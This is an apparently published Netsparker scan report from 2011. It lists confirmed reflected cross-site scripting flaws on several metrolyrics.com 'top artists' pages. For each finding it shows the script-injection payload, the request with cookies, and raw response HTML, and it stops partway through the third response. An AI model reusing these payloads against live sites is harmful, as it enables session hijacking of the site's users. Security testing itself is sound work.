XSS.CX Home

The DORK Report

Loading

XSS, Dork Report, metrolyrics.com SUMMARY

Netsparker - Scan Report Summary
TARGET URL
 http://www.metrolyrics.com/login.php
SCAN DATE
 3/6/2011 7:13:32 PM
REPORT DATE
 3/7/2011 6:22:14 AM
SCAN DURATION
 00:17:02

Total Requests

Average Speed

req/sec.
28
identified
22
confirmed
0
critical
3
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
75 %
MEDIUM
4 %
LOW
11 %
INFORMATION
11 %
Cross-site Scripting

Cross-site Scripting

20 TOTAL
IMPORTANT
CONFIRMED
17
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /top-artists-rb.html

/top-artists-rb.html CONFIRMED

http://www.metrolyrics.com/top-artists-rb.html?'"--></style></script><script>alert(0x000758)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000758)</script>

Request

GET /top-artists-rb.html?'"--></style></script><script>netsparker(0x000758)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/top-artists.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 16829
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:16:44 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="contact us" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Top Artists</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"artists","section":false,"sectionURL":false,"title":"Battle of the Artists"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist-main.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_1x1;tile=1;genre=rb;sz=1x1;ord=1299460604?"></script>

<div id="header">

<h1>Top Artists</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_728x90;tile=2;genre=rb;sz=728x90;ord=1299460604?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<h2>Music Genres</h2>
<ul>
<li><a title="Top Artists" href="top-artists.html" >Top Artists</a></li>
<li><a title="Pop Artists" href="top-artists-pop.html" >Pop</a></li>
<li><a title="Rock Artists" href="top-artists-rock.html" >Rock</a></li>
<li><a title="Hip Hop Artists" href="top-artists-hiphop.html" >Hip Hop</a></li>
<li><a title="Country Artists" href="top-artists-country.html" >Country</a></li>
<li><a title="R&amp;B Artists" href="top-artists-rb.html" class="on">R&amp;B</a></li>
</ul>
</div>
<div id="alphabetLeft">
<h2>Browse Alphabetically</h2>
<ul>
<li><a href="artists-a.html">A</a></li>
<li><a href="artists-b.html">B</a></li>
<li><a href="artists-c.html">C</a></li>
<li><a href="artists-d.html">D</a></li>
<li><a href="artists-e.html">E</a></li>
<li><a href="artists-f.html">F</a></li>
<li><a href="artists-g.html">G</a></li>
<li><a href="artists-h.html">H</a></li>
<li><a href="artists-i.html">I</a></li>
<li><a href="artists-j.html">J</a></li>
<li><a href="artists-k.html">K</a></li>
<li><a href="artists-l.html">L</a></li>
<li><a href="artists-m.html">M</a></li>
<li><a href="artists-n.html">N</a></li>
<li><a href="artists-o.html">O</a></li>
<li><a href="artists-p.html">P</a></li>
<li><a href="artists-q.html">Q</a></li>
<li><a href="artists-r.html">R</a></li>
<li><a href="artists-s.html">S</a></li>
<li><a href="artists-t.html">T</a></li>
<li><a href="..
- /top-artists-country.html

/top-artists-country.html CONFIRMED

http://www.metrolyrics.com/top-artists-country.html?'"--></style></script><script>alert(0x00075C)</s..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00075C)</script>

Request

GET /top-artists-country.html?'"--></style></script><script>netsparker(0x00075C)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/top-artists.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 16193
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:16:44 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="contact us" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Top Artists</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
<script type="text/javascript">
<!--//
//variables
var noEgg = false;
var nav={"activeTab":"artists","section":false,"sectionURL":false,"title":"Battle of the Artists"},

//Set dev server flag
is_dev = false,
//Analytics vars
_comscore = _comscore || [],
_gaq = _gaq || [];
//end analytics vars
//end variables

//start comscore tag
_comscore.push({ c1: "2", c2: "6036538", c3: "" });

(function() {
var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
el.parentNode.insertBefore(s, el);
})();

// Google tracking
_gaq.push(
['_setAccount', 'UA-50802-1'],
['_setCustomVar',1,"User Group ID",1,2],

['_trackPageview']
);


(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

// End Google tracking

//page specific JS

//End page specific JS
//-->
</script>

<link href="/css/g/artist-main.css" rel="stylesheet" type="text/css" media="screen" />

<!--[if IE 6]>
<script type="text/javascript" src="/js/iepngfix_tilebg.js"></script>
<![endif]-->


<script type="text/javascript">
__compete_code = '1980f0cd513fe80da3622c2ebed79163';
(function () {
var s = document.createElement('script'),
e = document.getElementsByTagName('script')[0],
t = document.location.protocol.toLowerCase() === 'https:' ?
'https://c.compete.com/bootstrap/' :
'http://c.compete.com/bootstrap/';
s.src = t + __compete_code + '/bootstrap.js';
s.type = 'text/javascript';
s.async = true;
if (e) { e.parentNode.insertBefore(s, e); }
}());
</script>

<!-- Quantcast Tag -->
<script type="text/javascript">
var _qevents = _qevents || [];

(function() {
var elem = document.createElement('script');
elem.src = (document.location.protocol == "https:" ? "https://secure" : "http://edge") + ".quantserve.com/quant.js";
elem.async = true;
elem.type = "text/javascript";
var scpt = document.getElementsByTagName('script')[0];
scpt.parentNode.insertBefore(elem, scpt);
})();

_qevents.push({
qacct:"p-c4eKHIvvd1eXQ"
});
</script>

<noscript>
<div style="display:none;">
<img src="//pixel.quantserve.com/pixel/p-c4eKHIvvd1eXQ.gif" border="0" height="1" width="1" alt="Quantcast"/>
</div>
</noscript>
<!-- End Quantcast tag -->





</head>


<!--[if IE 6 ]><body class="ie6"><![endif]-->
<!--[if IE 7 ]><body class="ie7"><![endif]-->
<!--[if gt IE 6 ]><body><![endif]-->
<!--[if !IE]><!--><body><!--<![endif]-->
<!-- ClickTale Top part -->
<script type="text/javascript">
var WRInitTime=(new Date()).getTime();
</script>
<!-- ClickTale end of Top part -->



<div id="bg-main">
<!-- Begin comScore Tag -->
<noscript>
<div style="display:none"> <img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036538&amp;c3=&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cj=1" alt="scorecard tracking image"/> </div>
</noscript>
<!-- End comScore Tag -->
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_1x1;tile=1;genre=country;sz=1x1;ord=1299460604?"></script>

<div id="header">

<h1>Top Artists</h1>

<div id="hdr-scroll">
<div id="hdr-scrollmenu">
<script type="text/javascript">var addthis_config = {ui_hover_direction: -1, data_ga_property: 'UA-50802-1', "data_track_clickback":true};</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=metroleap"></script>
<ul>
<li class="first"><img src="http://misc.ml-cdn.com/images/n2/loading_inline.gif" alt="Loading..." /></li>
</ul>
</div>
<div id="hdr-scrollsearch">
<form action="/search.php" method="get">
<input type="text" name="search" onclick="_gaq.push(['_trackEvent', 'Search', 'Header Dropdown Click']);if (this.value == 'Search ...') this.value=''" value="Search ..." onblur="if(this.value == '') this.value='Search ...'" id="hdr-scrollsearchip" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-scrollsearchbtn" />
</form>
</div>
</div>
<div id="headertop">
<div class="headerwrap">
<ul id="navmain">
<li id="hdr-lyrics" class="navprimaryli" data-tabname="lyrics">
<a href="/" class="navprimarya" title="Lyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Lyrics']);"><span></span>Lyrics</a>
<div id="hdr-sub-lyrics" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-artists" class="navprimaryli" data-tabname="artists">
<a href="/top-artists.html" title="Artists" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Artists']);"><span></span>Artists</a>
<div id="hdr-sub-artists" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-soundtracks" class="navprimaryli" data-tabname="soundtracks">
<a href="/soundtracks.html" title="soundtracks" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Soundtracks']);"><span></span>Soundtracks</a>
<div id="hdr-sub-soundtracks" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-news" class="navprimaryli" data-tabname="news">
<a href="/news.html" title="News" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'News']);"><span></span>News</a>
<div id="hdr-sub-news" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-apps" class="navprimaryli" data-tabname="apps">
<a href="/apps.html" title="Apps" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Apps']);"><span></span>Apps</a>
<div id="hdr-sub-apps" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-forum" class="navprimaryli" data-tabname="forum">
<a href="/forum/" title="Forum" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Top Nav Button Click', 'Forum']);"><span></span>Forum</a>
<div id="hdr-sub-forum" class="hdr-sub hdr-subhover container_6">
<img class="tabLoad" src="http://misc.ml-cdn.com/images/n2/tabLoad.gif" alt="Loading..." />
</div>
</li>
<li id="hdr-driver" class="navprimaryli">
<a href="http://itunes.apple.com/us/app/metrolyrics-pro/id370144420?mt=8" target="_blank" rel="nofollow" title="Get our iPhone App" class="navprimarya" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Driver Click', 'metrolyrics Pro App']);">Contests</a>
</li>
</ul>
<ul id="myml">

<li class="navprimaryli"><a href="/request.php" title="My MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'My MetroLyrics', 'Not logged in']);">My MetroLyrics<span></span></a></li>
<li class="navprimaryli"><div id="fb_login_btn"><fb:login-button size="small" perms="email"></fb:login-button></div><div id="fb-root"></div></li>
<li class="myml-alt myml-altfirst navprimaryli"><a href="/register.php" title="Sign Up for MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Sign Up']);">Sign Up</a></li>
<li class="myml-alt navprimaryli"><a rel="nofollow" id="login_link" class="iframe" href="/login.php" title="Login" onclick="_gaq.push(['_trackEvent', 'Navigation', 'Log In']);">Log In</a></li>

</ul>
</div>
</div>

<div id="headermid">
<div class="headerwrap">

<div id="headerlogo"><a href="/" title="Home">MetroLyrics</a></div>
<div id="headersearch">
<form method="get" action="/search.php">
<input type="hidden" name="category" value="artisttitle" />
<input type="text" name="search" onclick="if (this.value == 'Find Your Lyrics, Artists, Videos, more...') this.value='';_gaq.push(['_trackEvent', 'Search', 'Header Main Click']);" value="Find Your Lyrics, Artists, Videos, more..." onblur="if(this.value == '') this.value='Find Your Lyrics, Artists, Videos, more...'" id="hdr-ipsearch" />
<input type="hidden" name="category" value="artisttitle" />
<input type="submit" name="" value="Search" id="hdr-btnsearch" />
</form>
<p id="hdr-browse"></p>
</div>

</div>
</div>

<div id="headerbot">
<div class="headerwrap">

<p id="breadcrumbs">
<a href="/" id="bc-home" title="Home">Home</a> &raquo;
<a href="#" id="bc-tab"></a>
</p>
</div>
</div>

<div id="headerad">
<div id="hdrleaderboard">
<script type="text/javascript" src="http://gdfp.g.doubleclick.net/N6461/adj/Artist_BOA/Artist_BOA_top_728x90;tile=2;genre=country;sz=728x90;ord=1299460604?"></script>
</div>
<div id="hdrsocial">
<div class="addthis_default_style">
<a class="addthis_button_facebook_like" fb:like:layout="box_count" fb:like:width="48" fb:like:height="63" addthis:url="http://www.facebook.com/metrolyrics"></a>
<a class="addthis_button_tweet" tw:count="vertical" addthis:url="http://www.metrolyrics.com"></a>
<a class="addthis_counter"></a>
</div>
</div>
</div>

<div id="headercta"><a href="/register.php" title="Join MetroLyrics" onclick="_gaq.push(['_trackEvent', 'Header', 'Join Community Image']);">Join the MetroLyrics Community Today!</a></div>

</div>

<div id="main">


<div id="LRcolumns">
<div id="left">
<div id="Acolumn">
<div id="navLeft">
<h2>Music Genres</h2>
<ul>
<li><a title="Top Artists" href="top-artists.html" >Top Artists</a></li>
<li><a title="Pop Artists" href="top-artists-pop.html" >Pop</a></li>
<li><a title="Rock Artists" href="top-artists-rock.html" >Rock</a></li>
<li><a title="Hip Hop Artists" href="top-artists-hiphop.html" >Hip Hop</a></li>
<li><a title="Country Artists" href="top-artists-country.html" class="on">Country</a></li>
<li><a title="R&amp;B Artists" href="top-artists-rb.html" >R&amp;B</a></li>
</ul>
</div>
<div id="alphabetLeft">
<h2>Browse Alphabetically</h2>
<ul>
<li><a href="artists-a.html">A</a></li>
<li><a href="artists-b.html">B</a></li>
<li><a href="artists-c.html">C</a></li>
<li><a href="artists-d.html">D</a></li>
<li><a href="artists-e.html">E</a></li>
<li><a href="artists-f.html">F</a></li>
<li><a href="artists-g.html">G</a></li>
<li><a href="artists-h.html">H</a></li>
<li><a href="artists-i.html">I</a></li>
<li><a href="artists-j.html">J</a></li>
<li><a href="artists-k.html">K</a></li>
<li><a href="artists-l.html">L</a></li>
<li><a href="artists-m.html">M</a></li>
<li><a href="artists-n.html">N</a></li>
<li><a href="artists-o.html">O</a></li>
<li><a href="artists-p.html">P</a></li>
<li><a href="artists-q.html">Q</a></li>
<li><a href="artists-r.html">R</a></li>
<li><a href="artists-s.html">S</a></li>
<li><a href="artists-t.html">T</a></li>
<li><a h..
- /top-artists-hiphop.html

/top-artists-hiphop.html CONFIRMED

http://www.metrolyrics.com/top-artists-hiphop.html?'"--></style></script><script>alert(0x00076F)</sc..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00076F)</script>

Request

GET /top-artists-hiphop.html?'"--></style></script><script>netsparker(0x00076F)</script> HTTP/1.1
Referer: http://www.metrolyrics.com/top-artists.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.metrolyrics.com
Cookie: bblastvisit=1299460445; bbsessionhash=e10cebe70021d6be2f59d8cef6bb329f; bblastactivity=1299460453
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: LiteSpeed
X-Powered-By: PHP/5.3.2
Pragma: private
Content-Type: text/html; charset=utf-8
Content-Encoding:
Content-Length: 20896
Cache-Control: private, max-age=3600
Date: Mon, 07 Mar 2011 01:16:45 GMT
Connection: keep-alive
Vary: Accept-Encoding



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:addthis="http://www.addthis.com/help/api-spec" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="classification" content="music" />
<meta name="description" content="contact us" />
<meta name="keywords" content="lyrics" />
<meta property="fb:page_id" content="81914997331" />
<title>Top Artists</title>

<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="search" type="application/opensearchdescription+xml" title="metrolyrics" href="/tools/ff_search_bar.xml" />
<link href="/xml/justreleased.xml" rel="alternate" type="application/rss+xml" title="Recently Released Albums" />
<link href="/xml/futurerelease.xml" rel="alternate" type="application/rss+xml" title="Upcoming Album Releases" />
<link href="/xml/topartists.xml" rel="alternate" type="application/rss+xml" title="Top 20 Artists This Week" />
<link href="/xml/topsongs.xml" rel="alternate" type="application/rss+xml" title="Top 20 Lyrics This Week" />


